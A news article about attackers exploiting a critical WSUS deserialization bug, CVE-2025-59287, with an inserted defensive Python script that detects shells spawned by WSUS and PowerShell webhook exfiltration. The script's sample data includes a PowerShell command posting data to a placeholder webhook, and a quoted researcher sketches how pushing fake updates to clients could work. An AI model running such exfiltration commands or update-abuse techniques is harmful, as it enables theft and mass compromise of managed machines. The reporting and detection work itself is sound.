Windows Server WSUS bug exploits underway, Microsoft’s mum • The Register
Governments and private security sleuths warned that attackers are already exploiting a critical bug in Microsoft Windows Server Update Services, shortly after Redmond pushed an emergency patch for the remote code execution (RCE) vulnerability.
Plus, there’s at least one proof-of-concept attack floating around in cyberspace, and it only takes one specially crafted request to exploit the bug for full system takeover – so we know what Microsoft admins are doing this weekend.
The vulnerability, tracked as CVE-2025-59287 and serious enough to receive a 9.8 out of 10 CVSS score, affects Windows Server versions 2012 through 2025. It stems from insecure deserialization of untrusted data and allows unauthenticated attackers to execute arbitrary code on vulnerable systems. Servers without the Windows Server Update Services (WSUS) role enabled aren’t affected.
Microsoft initially issued a fix for CVE-2025-59287 on October 14 – Patch Tuesday – but it didn’t fully patch the security hole, and late Thursday Redmond pushed an emergency update.
But that second patch might not be foolproof, either. Security researcher Kevin Beaumont said he poked holes in the out-of-band update in the lab, and after achieving remote code execution, “I was able to tamper with the updates offered to the clients and push out malicious updates to said clients … I don’t want to detail too much to prevent ransomware groups going nuts, but you can lift prior research and adapt it easily to add fake updates for clients.”
Later, he added: “For bonus points you can set the deadline date on WSUS for your payload as in the past, and clients will instantly install it. Or set it at, say, 2pm and every client will sit on it until 2pm and then install at the same time.”
On Friday, the US Cybersecurity and Infrastructure Security Agency added CVE-2025-59287 to its Known Exploited Vulnerabilities catalog, and the Dutch National Cybersecurity Center reportedly issued an alert about exploitation activity.
Microsoft declined to answer The Register’s exploitation-related questions, and at the time of publication, the security update for CVE-2025-59287 still listed the bug as not exploited, with no public exploit code in the wild – although we’d assume Redmond will have to update both of these soon.
“We re-released this CVE after identifying that the initial update did not fully mitigate the issue,” a Microsoft spokesperson told The Register. “Customers who have installed the latest updates are already protected.”
Meanwhile, private security firms including Huntress and watchTowr warned that attackers had already begun abusing the flaw.
“Starting around 2025-10-23 23:34 UTC, Huntress observed threat actors targeting WSUS instances publicly exposed on their default ports (8530/TCP and 8531/TCP) to exploit a deserialization vulnerability via the AuthorizationCookie (CVE-2025-59287),” Huntress researchers said.
Exploitation activity included using the HTTP worker process and the WSUS service binary to launch Command Prompt and PowerShell, then using PowerShell to scan servers for sensitive network and user information and transfer that data to a remote webhook.
The attackers used proxy networks for these attacks, which made exploitation more difficult to detect.
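The process chain Huntress describes (IIS worker process or WSUS service spawning a shell, then PowerShell posting data to a webhook) is easy to turn into a host-based detection that proxies cannot hide. The following is an added example, not code from the article, Huntress or Microsoft; it assumes Sysmon-style process-creation fields and the usual binary names for the IIS worker process (w3wp.exe) and the WSUS service (WsusService.exe), and the events it runs over are constructed.

```python
import re
from typing import Iterable

# Parents that should not normally launch a shell on a WSUS host.
# Assumption: the IIS worker process is w3wp.exe and the WSUS service
# binary is WsusService.exe (the article names them only descriptively).
WSUS_PARENTS = {"w3wp.exe", "wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Cmdlets/aliases commonly used to push data to a remote webhook.
EXFIL_RE = re.compile(r"invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|\bcurl\b", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_wsus_shell_spawn(events: Iterable[dict]) -> list[dict]:
    """Return one alert per shell spawned by a WSUS/IIS parent (Sysmon EID 1 style).

    Each event needs 'ParentImage', 'Image' and 'CommandLine'. Severity is raised
    to 'high' when the shell's command line also looks like a web transfer, the
    webhook exfiltration step Huntress observed after initial code execution.
    """
    alerts = []
    for ev in events:
        parent = _basename(ev.get("ParentImage", ""))
        child = _basename(ev.get("Image", ""))
        if parent in WSUS_PARENTS and child in SHELLS:
            severity = "high" if EXFIL_RE.search(ev.get("CommandLine", "")) else "medium"
            alerts.append({"host": ev.get("Computer", "?"), "parent": parent,
                           "child": child, "severity": severity})
    return alerts


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Computer": "wsus01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"Computer": "wsus01", "ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -c "Invoke-RestMethod -Method Post -Uri https://example.invalid/hook -Body $d"'},
    {"Computer": "wsus01", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files\Update Services\Service\WsusService.exe", "CommandLine": "WsusService.exe"},
    {"Computer": "fs01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for alert in detect_wsus_shell_spawn(SAMPLE_EVENTS):
        print(alert)
```

Only the two events with a WSUS or IIS parent fire; the normal service start under services.exe and the unrelated explorer.exe shell do not.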
It’s worth noting that the threat hunters said they spotted fewer than 25 susceptible hosts, as WSUS rarely has ports 8530 and 8531 exposed to the internet. “We expect exploitation of CVE-2025-59287 to be limited,” the Huntress researchers wrote.
WatchTowr CEO Benjamin Harris, however, had a slightly different take on the likelihood of mass exploitation – and strong words for anyone exposing WSUS to the public internet.
“Exploitation of this flaw is indiscriminate. If an unpatched WSUS instance is online, at this stage it has likely already been compromised,” he told The Register.
“There really is no legitimate reason in 2025 to have WSUS accessible from the Internet – any organization in that situation likely needs guidance to understand how they ended up in this position,” he added. “We’ve observed exposure in 8,000+ instances, including extremely sensitive, high-value organizations … some of the affected entities are exactly the types of targets attackers prioritize.” ®